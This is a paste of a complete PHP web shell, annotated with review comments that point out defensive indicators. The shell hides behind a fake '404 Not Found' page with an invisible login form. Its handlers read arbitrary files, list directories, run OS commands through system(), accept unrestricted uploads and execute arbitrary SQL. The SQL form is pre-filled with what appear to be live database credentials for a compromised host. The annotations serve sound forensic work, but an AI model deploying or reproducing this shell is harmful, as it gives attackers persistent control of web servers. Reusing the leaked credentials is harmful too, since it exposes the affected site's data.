
Untitled

a guest
Feb 19th, 2018
  1. <?php
  // NOTE(review): hard-coded operator login for this web shell.
  // $password is a 32-hex-digit string that the login branch compares against md5() of the
  // submitted value, i.e. it is an unsalted MD5 digest rather than the password itself.
  // $nonsense is appended to $password before hashing to form the expected cookie value.
  // All three literals are stable strings, which makes them useful indicators when sweeping
  // a web root or backups for copies of this file.
  2. $username = "hacker";
  3. $password = "d3090ebbe9bb841fe7d262450f865bc5";
  4. $nonsense = "fjfhsljfshiofshioufhiufifuuhifsdfhdsdjkdfdskjksdfhskillojrjkseloefklk";
  5.  
  // Access gate: the operator panel that follows is only emitted when the request carries a
  // PrivatePageLogin cookie equal to md5($password.$nonsense). That value is built purely
  // from constants in this file, so it does not change between sessions.
  // The cookie name is a practical indicator for proxy or WAF logs that record cookies.
  6. if (isset($_COOKIE['PrivatePageLogin'])) {
  7. if ($_COOKIE['PrivatePageLogin'] == md5($password.$nonsense)) {
  8. ?>
  9.  
  10. <?php
  // ob_implicit_flush() switches on implicit flushing, so output from the handlers below is
  // pushed to the client as it is produced.
  11. ob_implicit_flush();
  // NOTE(review): arbitrary file read. The `f` request parameter is passed to fopen()
  // unchanged and the file is streamed back with fpassthru(); there is no path restriction
  // and the fopen() result is not checked before use.
  // Defensive angle: once this file is found on a host, anything readable by the web-server
  // account (configuration files, keys, application source) should be assumed exposed.
  // Requests to this script carrying an `f=` path are the matching log indicator.
  12. if(isset($_REQUEST['f'])){
  13. $filename=$_REQUEST['f'];
  14. $file=fopen("$filename","rb");
  15. fpassthru($file);
  16. die;
  17. }
  // NOTE(review): arbitrary directory listing. `d` from the request goes straight to
  // opendir(); each entry is printed as a link back to this script, using ?d= for
  // sub-directories and ?f= (the file-read handler) for everything else. Together the two
  // handlers expose every path the web-server account can traverse.
  // $PHP_SELF is not assigned in the visible code (presumably a register_globals-era
  // global), which hints at the age of the sample.
  // Log indicator: requests to this script with a `d=` parameter holding a filesystem path.
  18. if(isset($_REQUEST['d'])){
  19. $d=$_REQUEST['d'];
  20. echo "<pre>";
  21. if ($handle = opendir("$d")) {
  22. echo "<h2>listing of $d</h2>";
  23. while ($dir = readdir($handle)){
  24. if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
  25. else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
  26. echo "$dir\n";
  27. echo "</font></a>";
  28. }
  29.  
  30. } else echo "opendir() failed";
  31. closedir($handle);
  32. die ("<hr>");
  33. }
  // NOTE(review): arbitrary OS command execution. The `c` request parameter is handed to
  // system() unmodified and the command output is echoed inside a <pre> block, so commands
  // run with the privileges of the web-server / PHP worker account.
  // Defensive angle: child processes spawned by the PHP worker are the strongest runtime
  // signal for this handler. Where the application allows it, PHP's disable_functions
  // setting can remove system() and its siblings from web-facing pools.
  34. if(isset($_REQUEST['c'])){
  35. echo "<pre>";
  36. system($_REQUEST['c']);
  37. die;
  38. }
  // NOTE(review): unrestricted file upload. The destination is the caller-supplied `dir`
  // concatenated with the client-supplied original file name; neither value is validated,
  // so a file of any type can be written wherever the web-server account has write access.
  // $HTTP_POST_FILES is the legacy name of the upload array and is not assigned in the
  // visible code; like $PHP_SELF it hints at the age of the sample.
  // Defensive angle: file-integrity monitoring on web-writable directories, and refusing
  // script execution in upload directories, limit what this handler can achieve.
  39. if(isset($_REQUEST['upload'])){
  40. if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
  41. else $dir=$_REQUEST['dir'];
  42. $fname=$HTTP_POST_FILES['file_name']['name'];
  43. if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
  44. die('file uploading error.');
  45. }
  // NOTE(review): arbitrary SQL execution. Host, user, password, database name and the query
  // text all come from the request; the query is run as-is and every result row is dumped
  // with print_r(). Any database reachable from this host with known credentials can be
  // read or modified through this handler.
  // It uses the legacy mysql_* API, another hint at the age of the sample.
  // Defensive angle: review database audit logs for connections from the web host and for
  // queries that do not match the application's normal statements.
  46. if(isset($_REQUEST['mquery'])){
  47.  
  48. $host=$_REQUEST['host'];
  49. $usr=$_REQUEST['usr'];
  50. $passwd=$_REQUEST['passwd'];
  51. $db=$_REQUEST['db'];
  52. $mquery=$_REQUEST['mquery'];
  53. mysql_connect("$host", "$usr", "$passwd") or
  54. die("Could not connect: " . mysql_error());
  55. mysql_select_db("$db");
  56. $result = mysql_query("$mquery");
  57. if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
  58. while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);
  59. mysql_free_result($result);
  60. die;
  61. }
  62. ?>
  <!-- NOTE(review): operator panel markup. It provides one form per handler in this file:
       command execution (c), upload (file_name / dir / upload) and SQL (host / usr / passwd /
       db / mquery), plus usage text for the ?d= directory browser.
       The SQL form ships with a pre-filled user name, password and database name. These look
       like live credentials for a database on the affected host: treat them as compromised,
       rotate them, and review database access logs.
       $PHP_SELF, $SERVER_NAME and $REQUEST_URI are not assigned in the visible code
       (presumably register_globals-era globals). -->
  63. <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form>
  64. <form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
  65. upload file:<input name="file_name" type="file"> to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
  66. <hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
  67. <br>for example:
  68. http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
  69. or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
  70. <hr>execute mysql query:
  71. <form action="<? echo $PHP_SELF; ?>" METHOD=GET >
  72. host:<input type="text" name="host"value="localhost"> user: <input type="text" name="usr" value="ogswpffg_admin"> password: <input type="password" name="passwd" value="Fergie97">
  73.  
  74. database: <input type="text" name="db" value="ogswpffg_themes"> query: <input type="text" name="mquery"> <input type="submit" value="execute">
  75. </form>
  76. ?>
  77.  
  78. <?php
  // End of the authenticated path: stop here so the decoy markup further down is not
  // appended to the operator panel.
  79. exit;
  80. } else {
  // Cookie present but not matching: overwrite it with an empty value that expired an hour
  // ago, print a fixed message and stop. The message text is a distinctive string that can
  // be searched for in captured responses.
  81. setcookie("PrivatePageLogin", "", time()-3600);
  82. echo "Bad Cookie has been removed.";
  83. exit;
  84. }
  85. }
  86.  
  // Login handler for the form on the decoy page: reached with ?p=login in the query string
  // and POST fields `user` and `keypass`. In access logs this should appear as a POST to the
  // script with p=login followed by a redirect to the same path (TODO confirm against the
  // server's log format).
  87. if (isset($_GET['p']) && $_GET['p'] == "login") {
  88. if ($_POST['user'] != $username) {
  89. echo "Sorry, that username does not match.";
  90. exit;
  // The submitted value is MD5-hashed and compared with the stored digest in $password.
  91. } else if (md5($_POST['keypass']) != $password) {
  92. echo "Sorry, that password does not match.";
  93. exit;
  // Success: the cookie is md5(md5(keypass).$nonsense), which equals the
  // md5($password.$nonsense) value the cookie gate expects. setcookie() is called without
  // expiry, path, Secure or HttpOnly arguments.
  94. } else if ($_POST['user'] == $username && md5($_POST['keypass']) == $password) {
  95. setcookie('PrivatePageLogin', md5(md5($_POST['keypass']).$nonsense));
  // Redirect back to the script itself. There is no exit after header(), so execution
  // continues into the markup that follows.
  96. header("Location: $_SERVER[PHP_SELF]");
  // NOTE(review): appears unreachable, since the three branches above already cover every
  // outcome of the two comparisons.
  97. } else {
  98. echo "Sorry, you could not be logged in at this time.";
  99. }
  100. }
  101. ?>
  <!-- NOTE(review): decoy page shown to unauthenticated visitors. The markup imitates an
       Apache-style "404 Not Found" error body, but no status code is set anywhere in the
       visible PHP, so the response is presumably served with a success status. A "Not Found"
       body returned with a 200 status is a useful discrepancy to alert on.
       The form posts `user` and `keypass` to ?p=login. Its submit button is display:none, and
       the <style> rule at the end of the file gives every input a white background and a
       white border, so the login fields are not visible on the page. -->
  102. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  103. <html><head>
  104. <title>404 Not Found</title>
  105. </head><body>
  106. <h1>Not Found</h1>
  107. <p>The requested URL <?php echo $_SERVER['PHP_SELF']; ?> was not found on this server.</p>
  108. <p>Additionally, a 404 Not Found
  109. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  110. <form action="<?php echo $_SERVER['PHP_SELF']; ?>?p=login" method="post">
  111. <br><br><br><br><br><br>
  112. <input type="text" name="user" id="user" />
  113. <input type="password" name="keypass" id="keypass"/><br />
  114. <input type="submit" id="submit" value="Login" style="display:none;"/>
  115. </form>
  116. </body></html>
  117.  
  118. <style>
  119. input { margin:0;background-color:#fff;border:1px solid #fff; }
  120. </style>